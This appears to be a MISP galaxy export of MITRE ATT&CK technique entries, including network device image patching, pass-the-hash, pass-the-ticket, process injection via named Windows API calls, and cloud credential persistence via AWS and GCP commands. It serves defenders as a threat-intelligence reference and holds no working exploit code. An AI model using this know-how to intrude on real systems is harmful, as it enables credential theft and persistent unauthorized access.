Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.

To change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.

To change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system. This method typically requires administrative level access to the device.

In the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system. Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.

By modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599). Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).

Adversaries may also compromise existing commands in the operating system to produce false output to mislead defenders. When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system. By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade.

When the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005).

When the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots. However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Patch System Image - T1601.001"

Table 5651. Table References

Links

http://2015.zeronights.org/assets/files/05-Nosenko.pdf

https://attack.mitre.org/techniques/T1601/001

https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf

https://tools.cisco.com/security/center/resources/integrity_assurance.html#13

https://tools.cisco.com/security/center/resources/integrity_assurance.html#7

https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf

https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf

https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf

Exfiltration over USB - T1052.001

Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001"

Table 5652. Table References

Links

https://attack.mitre.org/techniques/T1052/001

Downgrade System Image - T1601.002

Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)

On embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.

Downgrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600). Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).

The tag is: misp-galaxy:mitre-attack-pattern="Downgrade System Image - T1601.002"

Table 5653. Table References

Links

https://attack.mitre.org/techniques/T1601/002

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

Windows Remote Management - T1021.006

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006"

Table 5654. Table References

Links

http://msdn.microsoft.com/en-us/library/aa384426

https://attack.mitre.org/techniques/T1021/006

https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc

https://msdn.microsoft.com/en-us/library/aa394582.aspx

https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2

File Transfer Protocols - T1071.002

Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002"

Table 5655. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1071/002

Uninstall Malicious Application - T1630.001

Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by:

  • Abusing device owner permissions to perform silent uninstallation using device owner API calls.

  • Abusing root permissions to delete files from the filesystem.

  • Abusing the accessibility service. This requires sending an intent to the system to request uninstallation, and then abusing the accessibility service to click the proper places on the screen to confirm uninstallation.

The tag is: misp-galaxy:mitre-attack-pattern="Uninstall Malicious Application - T1630.001"

Table 5656. Table References

Links

https://attack.mitre.org/techniques/T1630/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html

Invalid Code Signature - T1036.001

Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)

Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.

The tag is: misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001"

Table 5657. Table References

Links

https://attack.mitre.org/techniques/T1036/001

https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/

Local Data Staging - T1074.001

Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.

Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"

Table 5658. Table References

Links

https://attack.mitre.org/techniques/T1074/001

https://www.prevailion.com/darkwatchman-new-fileless-techniques/

Application Access Token - T1550.001

Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.

Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019)

OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)

For example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)

Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)

Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. For example, in AWS environments, an adversary who compromises a user’s AWS API credentials may be able to use the sts:GetFederationToken API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.

The tag is: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001"

Table 5659. Table References

Links

https://attack.mitre.org/techniques/T1550/001

https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/

https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials

https://cloud.google.com/iam/docs/service-account-monitoring

https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen

https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html

https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens

https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration

https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/

https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/

SQL Stored Procedures - T1505.001

Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).

Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017)

Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR)

The tag is: misp-galaxy:mitre-attack-pattern="SQL Stored Procedures - T1505.001"

Table 5660. Table References

Links

https://attack.mitre.org/techniques/T1505/001

https://blog.netspi.com/attacking-sql-server-clr-assemblies/

https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/

https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017

https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017

https://securelist.com/malicious-tasks-in-ms-sql-server/92167/

Archive via Utility - T1560.001

Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.

Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as <code>tar</code> on Linux and macOS or <code>zip</code> on Windows systems.

On Windows, <code>diantz</code> or <code> makecab</code> may be used to package collected files into a cabinet (.cab) file. <code>diantz</code> may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) <code>xcopy</code> on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration.

Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)

The tag is: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001"

Table 5661. Table References

Links

https://attack.mitre.org/techniques/T1560/001

https://en.wikipedia.org/wiki/List_of_file_signatures

https://lolbas-project.github.io/lolbas/Binaries/Diantz/

https://www.7-zip.org/

https://www.rarlab.com/

https://www.winzip.com/win/en/

Additional Cloud Credentials - T1098.001

Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.

For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)

In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the <code>CreateKeyPair</code> or <code>ImportKeyPair</code> API in AWS or the <code>gcloud compute os-login ssh-keys add</code> command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)

Adversaries may also use the <code>CreateAccessKey</code> API in AWS or the <code>gcloud iam service-accounts keys create</code> command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application’s service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation)

In AWS environments, adversaries with the appropriate permissions may also use the sts:GetFederationToken API call to create a temporary set of credentials tied to the permissions of the original user account. These credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated. (Citation: Crowdstrike AWS User Federation Persistence)

The tag is: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001"

Table 5662. Table References

Links

https://attack.mitre.org/techniques/T1098/001

https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add

https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/

https://expel.io/blog/finding-evil-in-aws/

https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/

https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/

https://posts.specterops.io/azure-privilege-escalation-via-service-principal-abuse-210ae2be2a5

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1

https://sysdig.com/blog/scarleteel-2-0/

https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/

https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815

Impersonate SS7 Nodes - T1430.002

Adversaries may exploit the lack of authentication in signaling system network nodes to track the to track the location of mobile devices by impersonating a node.(Citation: Engel-SS7)(Citation: Engel-SS7-2008)(Citation: 3GPP-Security)(Citation: Positive-SS7)(Citation: CSRIC5-WG10-FinalReport)

By providing the victim’s MSISDN (phone number) and impersonating network internal nodes to query subscriber information from other nodes, adversaries may use data collected from each hop to eventually determine the device’s geographical cell area or nearest cell tower.(Citation: Engel-SS7)

The tag is: misp-galaxy:mitre-attack-pattern="Impersonate SS7 Nodes - T1430.002"

Table 5663. Table References

Links

http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf

https://attack.mitre.org/techniques/T1430/002

https://berlin.ccc.de/tobias/31c3-ss7-locate-track-manipulate.pdf

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html

https://web.archive.org/web/20200330012714/https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf

https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf

https://www.youtube.com/watch?v=q0n5ySqbfdI

Compile After Delivery - T1027.004

Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)

Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)

The tag is: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004"

Table 5664. Table References

Links

https://attack.mitre.org/techniques/T1027/004

https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/

https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf

Remote Data Staging - T1074.002

Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)

By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.

The tag is: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002"

Table 5665. Table References

Links

https://attack.mitre.org/techniques/T1074/002

https://content.fireeye.com/m-trends/rpt-m-trends-2020

Portable Executable Injection - T1055.002

Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process.

PE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Portable Executable Injection - T1055.002"

Table 5666. Table References

Links

https://attack.mitre.org/techniques/T1055/002

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Pass the Hash - T1550.002

Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user’s cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.

When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)

The tag is: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002"

Table 5667. Table References

Links

https://attack.mitre.org/techniques/T1550/002

https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/

Archive via Library - T1560.002

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.

Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.

The tag is: misp-galaxy:mitre-attack-pattern="Archive via Library - T1560.002"

Table 5668. Table References

Links

https://attack.mitre.org/techniques/T1560/002

https://en.wikipedia.org/wiki/List_of_file_signatures

https://github.com/madler/zlib

https://libzip.org/

https://pypi.org/project/rarfile/

GUI Input Capture - T1056.002

Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).

Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs)

The tag is: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002"

Table 5669. Table References

Links

https://attack.mitre.org/techniques/T1056/002

https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html

https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/

https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/

https://logrhythm.com/blog/do-you-trust-your-computer/

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Dynamic API Resolution - T1027.007

Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.

API functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing)

To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.

Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as GetProcAddress() and LoadLibrary(). These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic API Resolution - T1027.007"

Table 5670. Table References

Links

https://attack.mitre.org/techniques/T1027/007

https://dr4k0nia.github.io/dotnet/coding/2022/08/10/HInvoke-and-avoiding-PInvoke.html?s=03

https://www.blackhat.com/docs/us-15/materials/us-15-Choi-API-Deobfuscator-Resolving-Obfuscated-API-Functions-In-Modern-Packers.pdf

https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection

https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware

Rename System Utilities - T1036.003

Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)

The tag is: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003"

Table 5671. Table References

Links

https://attack.mitre.org/techniques/T1036/003

https://lolbas-project.github.io/

https://twitter.com/ItsReallyNick/status/1055321652777619457

https://www.elastic.co/blog/how-hunt-masquerade-ball

https://www.f-secure.com/documents/996508/1030745/CozyDuke

Network Logon Script - T1037.003

Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.

Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

The tag is: misp-galaxy:mitre-attack-pattern="Network Logon Script - T1037.003"

Table 5672. Table References

Links

https://attack.mitre.org/techniques/T1037/003

https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008

Thread Execution Hijacking - T1055.003

Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process.

Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point the process can be suspended then written to, realigned to the injected code, and resumed via <code>SuspendThread </code>, <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.(Citation: Elastic Process Injection July 2017)

This is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Thread Execution Hijacking - T1055.003"

Table 5673. Table References

Links

https://attack.mitre.org/techniques/T1055/003

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Pass the Ticket - T1550.003

Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account’s password. Kerberos authentication can be used as the first step to lateral movement to a remote system.

When preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user’s service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)

A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)

A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)

Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)

The tag is: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003"

Table 5674. Table References

Links

http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos

http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf

https://adsecurity.org/?p=556

https://attack.mitre.org/techniques/T1550/003

https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf

https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/

Web Portal Capture - T1056.003

